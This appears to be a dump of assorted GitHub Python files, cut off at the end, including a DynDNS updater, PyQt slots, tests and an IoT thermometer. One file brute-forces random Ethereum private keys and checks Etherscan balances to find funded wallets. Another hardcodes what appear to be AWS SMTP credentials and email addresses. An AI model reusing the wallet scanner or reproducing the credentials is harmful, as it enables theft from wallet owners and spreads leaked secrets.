dns_updater import DNSUpdater\n\n\ndef main():\n parser = ArgumentParser(description=\"DynDNS updater\")\n parser.add_argument('-4, --ipv4-provider', dest=\"ipv4\")\n parser.add_argument('-6, --ipv6-provider', dest=\"ipv6\")\n parser.add_argument(\n '--server',\n help='DNS server to send the update to.',\n default='127.0.0.1',\n )\n parser.add_argument(\n '--keyfile',\n help='TSIG keyfile to sign the DNS update request.',\n default='',\n )\n parser.add_argument(\n 'zones',\n help='Zone(s) to update.',\n nargs='+',\n metavar='zone',\n )\n parser.add_argument(\n '--ttl',\n help='TTL of records to be updated',\n default=60,\n )\n args = parser.parse_args()\n\n if not args.ipv4 and not args.ipv6:\n parser.print_help()\n print('No address providers specified!')\n return 1\n\n # load all providers before doing anything with them\n providers = {}\n for protocol in ('ipv4', 'ipv6'):\n if not getattr(args, protocol):\n continue\n\n providers[protocol] = getattr(address_providers, getattr(args, protocol))()\n\n # let providers fetch addresses\n addresses = []\n if providers['ipv4']:\n addresses.append(providers['ipv4'].get_ipv4_address())\n if providers['ipv6']:\n addresses.append(providers['ipv6'].get_ipv6_network())\n\n # update zones\n updater = DNSUpdater(args.server, addresses, args.ttl, args.keyfile)\n for zone in args.zones:\n updater.update_zone(zone)\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"jplitza/dyndns","sub_path":"dyndns.py","file_name":"dyndns.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40362729670","text":"class TrackRefs:\n \"\"\"Object to track reference counts across test runs.\"\"\"\n\n def __init__(self, limit=40):\n self.type2count = {}\n self.type2all = {}\n self.limit = limit\n\n def update(self):\n import sys\n import logging\n obs = sys.getobjects(0)\n type2count = {}\n type2all = {}\n for o in obs:\n all = sys.getrefcount(o)\n\n if type(o) is str and o == '':\n # avoid dictionary madness\n continue\n t = type(o)\n if t in type2count:\n type2count[t] += 1\n type2all[t] += all\n else:\n type2count[t] = 1\n type2all[t] = all\n\n ct = [(type2count[t] - self.type2count.get(t, 0),\n type2all[t] - self.type2all.get(t, 0),\n t)\n for t in type2count.iterkeys()]\n ct.sort()\n ct.reverse()\n printed = False\n log = logging.getLogger(\"cofriend.utils.read_from_pgsql\")\n log.info(\"----------------------\")\n log.info(\"Memory profiling\")\n i = 0\n for delta1, delta2, t in ct:\n if delta1 or delta2:\n if not printed:\n log.info(\"%-55s %8s %8s\" % ('', 'insts', 'refs'))\n printed = True\n\n log.info(\"%-55s %8d %8d\" % (t, delta1, delta2))\n\n i += 1\n if i >= self.limit:\n break \n\n self.type2count = type2count\n self.type2all = type2all","repo_name":"krishnadubba/REMIND","sub_path":"python/base/utils/track_refs.py","file_name":"track_refs.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73541101848","text":"from PyQt5.QtCore import QUrl\nfrom PyQt5.QtGui import QDesktopServices\n\nimport clientside.client\nfrom ui.info import CustomDialog\nfrom ui.themes import ThemeCreator\nfrom utils.update import get_version\n\n\nclass HelpSlots:\n\n @staticmethod\n def about_chatroom(widget: clientside.client.Client) -> None:\n chatroom_version = get_version()\n\n info_window = CustomDialog(window_title=\"About Chatroom\",\n message=f\"**Current Version:** {chatroom_version}\\n\\n\"\n \"**Developer:** Valentine Wilson\\n\\n\"\n \"*[Source code](https://github.com/DiggidyDev/chatroom)*\",\n font=widget.current_font)\n info_window.exec_()\n\n @staticmethod\n def faq(widget: clientside.client.Client) -> None:\n faq_window = CustomDialog(window_title=\"FAQ\",\n message=\"Q: something\\n\\n\"\n \"A: another thing\",\n font=widget.current_font)\n faq_window.exec_()\n\n @staticmethod\n def report_a_bug() -> None:\n github_issues_url = QUrl(\"https://github.com/DiggidyDev/chatroom/issues\")\n QDesktopServices.openUrl(github_issues_url)\n\n\nclass FriendsSlots:\n\n @staticmethod\n def add_friend():\n pass\n\n @staticmethod\n def block_friend():\n pass\n\n @staticmethod\n def remove_friend():\n pass\n\n @staticmethod\n def view_friends(widget: clientside.client.Client):\n friends_list_dialog = CustomDialog(window_title=\"Friends\",\n message=widget.user.friends,\n font=widget.current_font)\n friends_list_dialog.exec_()\n\n\nclass ViewSlots:\n\n @staticmethod\n def change_fonts(widget: clientside.client.Client):\n try:\n widget.toggle_comic_sans()\n except Exception as e:\n print(e)\n\n @staticmethod\n def create_theme(widget: clientside.client.Client):\n a = ThemeCreator(widget)\n a.exec_()\n\n @staticmethod\n def toggle_alternate_row_colours(widget: clientside.client.Client):\n try:\n widget.toggle_alternate_row_colours()\n except Exception as e:\n print(e)\n\n @staticmethod\n def toggle_user_action_buttons(widget: clientside.client.Client):\n try:\n widget.toggle_user_buttons()\n except Exception as e:\n print(e)\n\n @staticmethod\n def toggle_user_list(widget: clientside.client.Client):\n try:\n widget.toggle_user_list()\n except Exception as e:\n print(e)\n","repo_name":"DiggidyDev/chatroom","sub_path":"clientside/actionslots.py","file_name":"actionslots.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14105416487","text":"import torch\r\nimport numpy as np\r\n\r\n#이미지 크기\r\nWIDTH = 64\r\nHEIGHT = 64\r\n\r\n#그리드 크기\r\nGRID_WIDTH = 8\r\nGRID_HEIGHT = 8\r\n\r\n#그리드 한 칸의 길이 ex)256//16 = 16\r\nONE_GRID_WIDTH = WIDTH //GRID_WIDTH\r\nONE_GRID_HEIGHT = HEIGHT //GRID_HEIGHT\r\n\r\n#대각선 길이, 최대 거리차. (정확도 측정에 이용)\r\n#WIDTH/HEIGHT 크기 삼각형의 대각선이 아니라\r\n#중앙점 기준이므로 (WIDTH-ONE_GRID_WIDTH)/(HEIGHT-ONE_GRID_HEIGHT) 크기의 삼각형의 대각선.\r\nDIAGONOL= np.sqrt(np.square(WIDTH-ONE_GRID_WIDTH) + np.square(HEIGHT-ONE_GRID_HEIGHT))\r\n\r\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n\r\n#image/annotaion file 경로 \r\n#1- 1000개 라벨링 한 경로\r\n#2- 추가 라벨링한 2000개 set\r\n\r\nimgPath = \".././data/1000sets/images\" #이미지들 path\r\nlabelPath = \".././data/1000sets/annotations.xml\" #annotations path\r\n\r\nimgPath_2 = \".././data/2000sets/images\" #이미지들 path\r\nlabelPath_2 = \".././data/2000sets/annotations.xml\" #annotations path","repo_name":"es3242/frontWheelDetector","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33115584611","text":"import getpass\nimport platform\nimport time\nfrom datetime import datetime, timedelta\n\nimport distro\nimport psutil\nfrom rich.table import Table\nfrom textual.widget import Widget\n\n\nclass InfoLine(Widget):\n def on_mount(self):\n self.width = 0\n self.height = 0\n self.set_interval(1.0, self.refresh)\n\n # The getlogin docs say:\n # > For most purposes, it is more useful to use getpass.getuser() [...]\n # username = os.getlogin()\n username = getpass.getuser()\n ustring = f\"{username} @\"\n node = platform.node()\n if node:\n ustring += f\" [b]{platform.node()}[/]\"\n\n system = platform.system()\n if system == \"Linux\":\n ri = distro.os_release_info()\n system_list = [ri[\"name\"]]\n if \"version_id\" in ri:\n system_list.append(ri[\"version_id\"])\n system_list.append(f\"{platform.architecture()[0]} / {platform.release()}\")\n system_string = \" \".join(system_list)\n elif system == \"Darwin\":\n system_string = f\"macOS {platform.mac_ver()[0]}\"\n else:\n # fallback\n system_string = \"\"\n\n self.left_string = \" \".join([ustring, system_string])\n self.boot_time = psutil.boot_time()\n\n def render(self):\n uptime = timedelta(seconds=time.time() - self.boot_time)\n h, m = seconds_to_h_m(uptime.seconds)\n\n right = [f\"up {uptime.days}d, {h}:{m:02d}h\"]\n\n bat = psutil.sensors_battery()\n if bat is not None:\n # hh, mm = seconds_to_h_m(bat.secsleft)\n bat_string = f\"bat {bat.percent:.1f}%\"\n if bat.power_plugged:\n bat_string = \"[green]\" + bat_string + \"[/]\"\n elif bat.percent < 10:\n bat_string = \"[red reverse bold]\" + bat_string + \"[/]\"\n elif bat.percent < 15:\n bat_string = \"[red]\" + bat_string + \"[/]\"\n elif bat.percent < 20:\n bat_string = \"[yellow]\" + bat_string + \"[/]\"\n right.append(bat_string)\n\n table = Table(show_header=False, expand=True, box=None, padding=0)\n if self.width < 100:\n table.add_column(justify=\"left\", no_wrap=True)\n table.add_column(justify=\"right\", no_wrap=True)\n table.add_row(self.left_string, \", \".join(right))\n else:\n table.add_column(justify=\"left\", no_wrap=True, ratio=1)\n table.add_column(justify=\"center\", no_wrap=True, ratio=1)\n table.add_column(justify=\"right\", no_wrap=True, ratio=1)\n table.add_row(\n self.left_string, datetime.now().strftime(\"%c\"), \" \".join(right)\n )\n return table\n\n async def on_resize(self, event):\n self.width = event.width\n self.height = event.height\n\n\ndef seconds_to_h_m(seconds):\n return seconds // 3600, (seconds // 60) % 60\n","repo_name":"nschloe/tiptop","sub_path":"src/tiptop/_info.py","file_name":"_info.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":1517,"dataset":"github-code","pt":"31"} +{"seq_id":"28653216245","text":"import numpy as np\nimport cv2\n\n# input image array\nimg = np.array([[3, 4, 8, 1, 7],\n [9, 4, 2, 1, 6],\n [7, 8, 8, 1, 1]], np.uint8)\n\n# kernel array\nkernel = np.array([[0, 1, 0],\n [1, 1, 0],\n [0, 1, 0]], np.uint8)\n\n# performing opening using erosion followed by dilation\nerosion = cv2.erode(img,kernel,iterations = 1)\ndilation = cv2.dilate(erosion,kernel,iterations = 1)\n\n# performing opening using its function\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\nprint(dilation)\nprint(opening)\nprint(dilation==opening)\n\n# Conclusion\n# Opening is just another way of saying erosion followed by dialtion","repo_name":"Geekosophers/morphological-operations","sub_path":"Opening/grayscaleOpening.py","file_name":"grayscaleOpening.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"5704616341","text":"import unittest\r\nfrom parameterized import parameterized\r\nfrom core.data_handlers.SongTable import SongTable\r\nfrom exceptions.ColumnValueException import ColumnValueNotExistException\r\nfrom exceptions.sql_handler.sql_handler_exceptions.ColumnNameException import ColumnNameNotExistException\r\n\r\n\r\nclass SongTableTest(unittest.TestCase):\r\n\r\n def tearDown(self):\r\n self.songs.drop()\r\n\r\n def setUp(self):\r\n self.songs = SongTable('../sources/processed_data/spotify_music/SpotifyFeatures.csv')\r\n\r\n @parameterized.expand([\r\n ('SongTableTest_Test_01', '0BjC1NfoEOOusryehmNudP', False),\r\n ('SongTableTest_Test_02', '0BRjO6ga9RKCKjfDqeFgW5', True)\r\n ])\r\n def test_item_not_exist(self, _, test_song_id, expected):\r\n self.assertEqual(expected, self.songs.item_not_exist('SONGS', 'song_id', test_song_id))\r\n\r\n @parameterized.expand([\r\n ('SongTableTest_Test_03', '0BRjO6ga9RKCKjfDqeFgWV', 'artist_name', True)\r\n ])\r\n def test_check_column_value_validity(self, _, test_song_id, test_column_name, expected):\r\n self.assertEqual(expected, self.songs.check_column_value_validity(test_song_id, test_column_name))\r\n\r\n @parameterized.expand([\r\n ('SongTableTest_Test_04', ColumnNameNotExistException, '0BRjO6ga9RKCKjfDqeFgWV', 'Weight'),\r\n ('SongTableTest_Test_05', ColumnValueNotExistException, '0BjC1NfoEOOusryehmNuda', 'artist_name')\r\n ])\r\n @unittest.skip('Exception no more raised')\r\n def test_check_column_value_validity2(self, _, test_exception, test_song_id, test_column_name):\r\n self.assertRaises(test_exception, self.songs.check_column_value_validity, test_song_id, test_column_name)\r\n\r\n @parameterized.expand([\r\n ('SongTableTest_Test_07', '0BRjO6ga9RKCKjfDqeFgWV', 'artist_name', 'Henri Salvador', 'Henri Salvador')\r\n ])\r\n def test_update(self, _, test_song_id, test_column_name, test_new_column_value, expected):\r\n self.songs.update(test_song_id, test_column_name, test_new_column_value)\r\n new_column_value = self.songs.search(conditions=((test_column_name,), [('song_id', '=', test_song_id)]))\r\n self.assertEqual(expected, new_column_value)\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"wilsonjefferson/DSSC_IR","sub_path":"tests/SongTableTest.py","file_name":"SongTableTest.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34609174829","text":"import time\nimport sys\nfrom setting import session\nfrom sqlalchemy.sql import text\n\ndef main(loop):\n insert_sql = text(f\"INSERT INTO test_users (loop_value) VALUES ('loop-{loop}')\")\n session.execute(insert_sql)\n session.commit()\n\n select_sql = text(\"SELECT NOW() AS now, @@hostname AS hostname\")\n for row in session.execute(select_sql):\n print(f\"{row['now']} - {row['hostname']}\")\n\n\nif __name__ == '__main__':\n loop = 0\n while (True):\n try:\n main(loop)\n except:\n print(sys.exc_info())\n pass\n finally:\n session.close()\n loop +=1\n time.sleep(1)\n","repo_name":"a4t/sqlalchemy_small_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71783382167","text":"from mpi4py import MPI\nimport adios2\nimport numpy as np\n\n\n# MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n# User data\nmyArray = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\nnx = myArray.size\ntime = np.array([0.0])\n\n# ADIOS\nadios = adios2.ADIOS(comm)\n\n# IO\nbpIO = adios.DeclareIO(\"BPN2N\")\n\n# Variables\nbpArray = bpIO.DefineVariable(\n \"bpArray\", myArray, [size * nx], [rank * nx], [nx], adios2.ConstantDims\n)\nbpTimeStep = bpIO.DefineVariable(\"bpTimeStep\", time)\n\n# Engine\nbpFileWriter = bpIO.Open(\"myArray.bp\", adios2.Mode.Write)\n# Doesn't work: bpFileWriter = bpIO.Open(\"myArray.bp\", adios2.OpenModeWrite)\n# Doesn't work: bpFileWriter = bpIO.Open(\"myArray.bp\", adiosOpenModeWrite,\n# MPI.COMM_WORLD)\n\n\nfor t in range(0, 10):\n bpFileWriter.BeginStep()\n if rank == 0:\n time[0] = t\n bpFileWriter.Put(bpTimeStep, time)\n bpFileWriter.Put(bpArray, myArray)\n bpFileWriter.EndStep()\n\nbpFileWriter.Close()\n","repo_name":"ornladios/ADIOS2","sub_path":"examples/hello/bpTimeWriter/bpTimeWriter.py","file_name":"bpTimeWriter.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"31"} +{"seq_id":"13051727432","text":"#!/usr/bin/env python3.9\n\n\"\"\"\nThis modifies the amazing AquaTouch BTT touchbar profile to match my personal preferences\nDid this as a script so that I don't need to re-do this every time AquaTouch is updated\n\"\"\"\n\nimport json\nimport base64\nfrom functools import partial\nimport os\nimport plistlib\nimport uuid\nimport zipfile\nimport sys\nimport copy\nfrom collections import namedtuple\nfrom typing import Dict, List, Any, Sequence, Callable, Union, Optional\n\n\nAppInfo = namedtuple(\"AppInfo\", [\"bundle_name\", \"app_name\"])\nJSON_CFG_FILENAME = \"presetjson.bttpreset\"\nTRIGGER_TYPES_TO_DELETE = {653}\nTRIGGER_APPS_TO_DELETE = {\"Media Key Shortcuts\"}\nAPPS_TO_CLONE = {\n AppInfo(\"com.microsoft.VSCode\", \"Visual Studio Code\"): [\n AppInfo(\"com.microsoft.VSCodeInsiders\", \"Visual Studio Code - Insiders\"),\n AppInfo(\"com.microsoft.VSCodeExploration\", \"Visual Studio Code - Exploration\"),\n ]\n}\n\n\ndef load_cfg_file(zipfile: zipfile.ZipFile, path: str) -> Dict[str, Any]:\n return json.loads(zipfile.read(path))\n\n\ndef compute_new_uid(\n copy_from: int,\n copy_to: int,\n item_count: int,\n uid_value: int,\n) -> int:\n if uid_value < copy_from or uid_value > copy_to:\n # ref to something else\n return uid_value\n return item_count + (uid_value - copy_from)\n\n\ndef recursive_modify_collection(v: Union[Dict, List], modify_callable: Callable) -> None:\n if isinstance(v, dict):\n for key, value in v.items():\n if isinstance(value, dict):\n recursive_modify_collection(value, modify_callable)\n continue\n if isinstance(value, list):\n recursive_modify_collection(value, modify_callable)\n continue\n new_value = modify_callable(key, value)\n if new_value is not None:\n v[key] = new_value\n elif isinstance(v, list):\n for item_pos, item in enumerate(v):\n if isinstance(item, (list, dict)):\n recursive_modify_collection(item, modify_callable)\n else:\n new_value = modify_callable(None, item)\n if new_value:\n v[item_pos] = new_value\n else:\n print(f\"Ignoring item of type {type(v)}\")\n\n\ndef clone_app(source_app: Dict[str, Any], target_app: AppInfo) -> Dict[str, Any]:\n def fix_uuid(key: str, value: str) -> str:\n if key != \"BTTUUID\":\n return None\n\n if not isinstance(value, str):\n raise ValueError(f\"Key BTTUUID should be of type str, found {type(value)}\")\n return str(uuid.uuid4()).upper().strip()\n\n new_app = copy.deepcopy(source_app)\n new_app[\"BTTAppName\"] = target_app.app_name\n new_app[\"BTTAppBundleIdentifier\"] = target_app.bundle_name\n # Regenerate UUIDs\n recursive_modify_collection(new_app, fix_uuid)\n return new_app\n\n\ndef add_supported_app(\n app_config: Dict[str, Any],\n source_app: AppInfo,\n target_apps: Sequence[AppInfo],\n) -> None:\n def fix_uuids(\n copy_from: int,\n copy_to: int,\n previous_length: int,\n key: Any,\n value: Any,\n ) -> plistlib.UID:\n if isinstance(value, plistlib.UID):\n value.data = compute_new_uid(\n copy_from,\n copy_to,\n previous_length,\n value.data\n )\n return None\n\n activation_group_cond = app_config[\"BTTActivationGroupCondition\"]\n # Condition is a base64-encoded binary plist\n parsed_plist = plistlib.loads(base64.urlsafe_b64decode(activation_group_cond))\n # Note to future self: I have no clue how plist's work - just what I gathered\n # from reading and reversing the existing file\n #\n # figure out the right operators\n\n try:\n center = parsed_plist[\"$objects\"].index(source_app.bundle_name)\n use_bundle = True\n except:\n center = parsed_plist[\"$objects\"].index(source_app.app_name)\n use_bundle = False\n\n # start searching back from the located bundle / app name\n # keep track of any index with a forward ref to our bundle/app name\n # or a forward ref to another item that has one to it (transitive)\n idxs_to_search = [center]\n for i in range(center, 0, -1):\n obj_at_pos = parsed_plist[\"$objects\"][i]\n if not isinstance(obj_at_pos, dict):\n continue\n for k, v in obj_at_pos.items():\n # if the curre\n if isinstance(v, plistlib.UID):\n if v.data in idxs_to_search:\n # Keep track of the new forward ref\n idxs_to_search.append(i)\n copy_from = idxs_to_search[-1]\n\n # The first item in our predicate will have forward refs to all the required bits\n # including the predicate\n # transitively search for it\n copy_to = max(\n (\n v.data\n for k, v in parsed_plist[\"$objects\"][copy_from].items()\n if isinstance(v, plistlib.UID)\n )\n )\n # search for potential forward refs from copy_to onwards\n while True:\n if not isinstance(parsed_plist[\"$objects\"][copy_to], dict):\n break\n new_max = max(\n (\n v.data\n for k, v in parsed_plist[\"$objects\"][copy_to].items()\n if isinstance(v, plistlib.UID)\n )\n )\n if new_max <= copy_to:\n break\n copy_to = new_max\n\n root_levels_to_add = []\n for target_app in target_apps:\n new_items = copy.deepcopy(parsed_plist[\"$objects\"][copy_from:(copy_to + 1)])\n previous_length = len(parsed_plist[\"$objects\"])\n print(f\"Adding {target_app} - starting at ID {previous_length}\")\n root_levels_to_add.append(previous_length)\n fix_callable = partial(fix_uuids, copy_from, copy_to, previous_length)\n for item_pos, item in enumerate(new_items):\n if isinstance(item, plistlib.UID):\n fix_callable(None, item)\n elif isinstance(item, (list, dict)):\n recursive_modify_collection(item, fix_callable)\n elif isinstance(item, str):\n if use_bundle and item == source_app.bundle_name:\n new_items[item_pos] = target_app.bundle_name\n elif not use_bundle and item == source_app.app_name:\n new_items[item_pos] = target_app.app_name\n parsed_plist[\"$objects\"].extend(new_items)\n\n # find top level pointer to all the apps\n for item_pos, item in enumerate(parsed_plist[\"$objects\"]):\n if not isinstance(item, dict):\n continue\n if \"NS.objects\" not in item:\n continue\n # search for our minimum range - i.e. the first item that denoted the app entry we copied\n if plistlib.UID(copy_from) in item[\"NS.objects\"]:\n for new_root in root_levels_to_add:\n item[\"NS.objects\"].append(plistlib.UID(new_root))\n break\n else:\n raise ValueError(\"Could not append new app - could not locate root level list\")\n\n print(\"Added to root tree - dumping plist and we'll be done\")\n app_config[\"BTTActivationGroupCondition\"] = base64.standard_b64encode(\n plistlib.dumps(\n parsed_plist, fmt=plistlib.FMT_BINARY, sort_keys=True,\n )\n ).decode(\"ascii\")\n\n\ndef remove_touchbar_ctx(loaded_cfg: Dict[str, Any]) -> Dict[str, Any]:\n if \"BTTPresetContent\" not in loaded_cfg:\n raise ValueError(\"BTTPresetContent not preset at the root level - invalid preset spec\")\n\n found_apps = {\n source_app: False\n for source_app in APPS_TO_CLONE\n }\n for app_pos, app_config in enumerate(loaded_cfg[\"BTTPresetContent\"]):\n # Delete the touchbar button that overrides the global music player\n app_name = app_config[\"BTTAppName\"]\n print(f\"Checking {app_name}...\")\n for app_to_delete in TRIGGER_APPS_TO_DELETE:\n if app_to_delete in app_name:\n print(\"Deleting it...\")\n del loaded_cfg[\"BTTPresetContent\"][app_pos]\n continue\n\n for trigger_pos, trigger in enumerate(app_config.get(\"BTTTriggers\", [])):\n if trigger.get(\"BTTTriggerType\") in TRIGGER_TYPES_TO_DELETE:\n print(f\"Found trigger to delete at pos {trigger_pos}\")\n del app_config[\"BTTTriggers\"][trigger_pos]\n\n # Copy apps\n app_key = AppInfo(app_config.get(\"BTTAppBundleIdentifier\"), app_name)\n if app_key in APPS_TO_CLONE:\n found_apps[app_key] = True\n for target_app in APPS_TO_CLONE[app_key]:\n new_app = clone_app(app_config, target_app)\n loaded_cfg[\"BTTPresetContent\"].append(new_app)\n\n # Check if activation group\n if (\n \"BTTActivationGroupName\" in app_config\n and \"BTTActivationGroupCondition\" in app_config\n ):\n if \"UNSUPPORTED APP\" in app_name.upper():\n for source_app, target_apps in APPS_TO_CLONE.items():\n add_supported_app(app_config, source_app, target_apps)\n\n for source_app, was_found in found_apps.items():\n if was_found:\n print(f\"Config could be copied successfully for {source_app}\")\n else:\n raise RuntimeError(f\"Failed to find source config for {source_app}\")\n return loaded_cfg\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n sys.exit(f\"Usage: {sys.argv[0]} source-file (bttpreset ext)\")\n input_zipfile = zipfile.ZipFile(sys.argv[1], mode=\"r\")\n loaded_cfg_file = load_cfg_file(input_zipfile, JSON_CFG_FILENAME)\n modified_cfg_file = remove_touchbar_ctx(loaded_cfg_file)\n\n current_fname, current_ext = os.path.splitext(sys.argv[1])\n new_path = f\"{current_fname}_new{current_ext}\"\n new_zipfile = zipfile.ZipFile(new_path, \"w\")\n for item in input_zipfile.infolist():\n buffer = input_zipfile.read(item.filename)\n if (item.filename != JSON_CFG_FILENAME):\n new_zipfile.writestr(item, buffer)\n else:\n new_zipfile.writestr(JSON_CFG_FILENAME, json.dumps(modified_cfg_file))\n","repo_name":"vagaerg/tweak-btt-profile","sub_path":"tweak_profile.py","file_name":"tweak_profile.py","file_ext":"py","file_size_in_byte":10084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34150973684","text":"from eth_account import Account\nimport subprocess\nimport secrets\n\n#x = 0\nfunds = \"$0.00\"\npriv = \"\"\npub = \"\"\n\nwhile funds == \"$0.00\":\n\n priv = secrets.token_hex(32)\n private_key = \"0x\" + priv \n acct = Account.from_key(private_key) \n pub = acct.address\n\n #if x == 5:\n #priv = \"no idea\"\n #pub = \"0xfc5c9bd4444908f535027cc4b39f7287f7654ffc\"\n\n result = subprocess.run(['curl', '-s', 'https://etherscan.io/address/' + pub], stdout=subprocess.PIPE)\n getext = result.stdout\n gettext = str(getext)\n\n for i in range(len(gettext)):\n if gettext[i] + gettext[i+1] + gettext[i+2] + gettext[i+3] == \"8\\\">$\":\n j = i\n funds = \"\"\n while gettext[j+3] != \"<\":\n funds += gettext[j+3]\n j += 1\n break\n print(pub + \" = \" + funds + \" in \" + priv)\n #x += 1\n\nprint(\"Account Private Key: \" + priv)\nprint(\"Account Public Key: \" + pub)\nprint(\"Funds: \" + funds)\n","repo_name":"Hamzak212/Java_InarAcademy","sub_path":"src/chapters/chapter_eight/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38870783118","text":"#!/usr/bin/env python3\n########################################################################\n# Filename : IOTtempSensor.py\n# Description : A thermometer that will alert via email when a\n# temperature is too high or too low\n# Author : Nathan Roth\n# modification: 06/03/2021\n########################################################################\nimport RPi.GPIO as GPIO\nimport time\nimport math\nfrom ADCDevice import *\nfrom PCF8574 import PCF8574_GPIO\nfrom Adafruit_LCD1602 import Adafruit_CharLCD\nfrom time import sleep, strftime\nfrom datetime import datetime\nimport smtplib\nfrom email.mime.text import MIMEText\nimport urllib.request\n\n# Define an ADCDevice class object\nadc = ADCDevice()\n\n########################################################################\n# Function: setup()\n# Purpose: to set up the adc's I2C connection\n# it will check for one of two possible chips, then set the\n# ADC to that chip\n# Arguments:\n# none\n# Returns:\n# none\n########################################################################\ndef setup():\n global adc\n # Detect the pcf8591.\n if(adc.detectI2C(0x48)):\n adc = PCF8591()\n # Detect the ads7830\n elif(adc.detectI2C(0x4b)):\n adc = ADS7830()\n else:\n print(\"No correct I2C address found, \\n\"\n \"Please use command 'i2cdetect -y 1' to check the I2C address!\"\n \"\\n\"\n \"Program Exit. \\n\")\n exit(-1)\n\n########################################################################\n# Function: email(temp)\n# Purpose: to email important users that the temperature is too high\n# Arguments:\n# temperature - a string of the current temperature\n# Returns:\n# none\n########################################################################\ndef email(temp):\n sender = 'nathand12roth@gmail.com'\n receiver = 'test.client.nathan@gmail.com'\n\n msg = MIMEText('The temperature in the room has reached an unsafe'+\n ' level. \\n' +\n 'It is currently ' + temp + ' \\n' +\n 'At ' + get_time_now())\n\n msg['Subject'] = 'UNSAFE TEMPERATURE'\n msg['From'] = 'nathand12roth@gmail.com'\n msg['To'] = 'test.client.nathan@gmail.com'\n\n user = 'AKIA4MSHZC43BLIFMWH4'\n password = 'BOxbP94WsziQQc3W0bek3DKXsQcEe3lVjuSkXOggt72l'\n\n with smtplib.SMTP(\"email-smtp.us-east-1.amazonaws.com\", 587) as server:\n\n server.starttls()\n\n server.login(user, password)\n server.sendmail(sender, receiver, msg.as_string())\n print(\"mail successfully sent\")\n\n########################################################################\n# Function: get_tempF()\n# Purpose: Gets the current temperature in Fahrenheit, and if the\n# temperature is greater than 85F or lower than 68F then\n# an email will be sent to the appropriate users\n# Arguments:\n# none\n# Returns:\n# CurrentTemp - The Current temperature as a string\n########################################################################\ndef get_tempF():\n tempK = calculate_K()\n # calculate temperature (fahrenheit)\n tempF = ((tempK - 273.15 ) * 1.8) + 32\n currentTemp = '{:.2f}'.format( tempF ) + ' F'\n if(tempF > 85 or tempF < 64):\n time_check(currentTemp)\n return currentTemp\n\n########################################################################\n# Function: get_tempC()\n# Purpose: Gets the current temperature in Fahrenheit, and if the\n# temperature is greater than 29.5C or lower than 17.8C\n# then an email will be sent to the appropriate users\n# Arguments:\n# none\n# Returns:\n# CurrentTemp - The Current temperature as a string\n########################################################################\ndef get_tempC():\n tempK = calculate_K()\n # calculate temperature (Celsius)\n tempC = tempK - 273.15\n currentTemp = '{:.2f}'.format( tempC ) + ' C'\n if(tempC > 29.5 or tempC < 17.8):\n time_check(currentTemp)\n return currentTemp\n\n########################################################################\n# Function: get_tempK()\n# Purpose: Gets the current temperature in Fahrenheit, and if\n# the temperature is greater than 302.6K or lower\n# than 290.9K then an email will be sent to the\n# appropriate users\n# Arguments:\n# none\n# Returns:\n# CurrentTemp - The Current temperature as a string\n########################################################################\ndef get_tempK():\n tempK = calculate_K()\n currentTemp = '{:.2f}'.format( tempK ) + ' K'\n if(tempK > 302.6 or tempK < 290.9):\n time_check(currentTemp)\n return currentTemp\n\n########################################################################\n# Function: time_check(temp)\n# Purpose: Checks if there has been an email sent out within\n# 10 seconds, then send the appropriate email\n# Arguments:\n# CurrentTemp - the temperature that was detected\n# Returns:\n# none\n########################################################################\ndef time_check(currentTemp):\n tempTime = time.time()\n if(((tempTime - globals()['emailTime']) > 10) and (globals()['connected'] == 1)):\n email(currentTemp)\n globals()['emailTime'] = tempTime\n\n########################################################################\n# Function: calculate_K()\n# Purpose: to calculate the temperature in Kelvin\n# Arguments:\n# none\n# Returns:\n# tempK - the temperature in Kelvin\n########################################################################\ndef calculate_K():\n # read ADC value A0 pin\n value = adc.analogRead(0)\n # calculate voltage\n voltage = value / 255.0 * 3.3\n # calculate resistance value of thermistor\n Rt = 10 * voltage / (3.3 - voltage)\n # calculate temperature (Kelvin)\n tempK = 1/(1/(273.15 + 25) + math.log(Rt/10)/3950.0)\n return tempK\n\n########################################################################\n# Function: get_time_now()\n# Purpose: to get the current time in H:M:S format\n# Arguments:\n# none\n# Returns:\n# time - the current time in H:M:S format\n########################################################################\ndef get_time_now():\n time = datetime.now().strftime('%H:%M:%S')\n return time\n\n########################################################################\n# Function: loop()\n# Purpose: the main polling loop that will get the current\n# temp and time then print them to the LCD\n# Arguments:\n# none\n# Returns:\n# none\n########################################################################\ndef loop():\n # turn on LCD backlight\n mcp.output(3,1)\n # set number of LCD lines and columns\n lcd.begin(16,2)\n while(True):\n try:\n 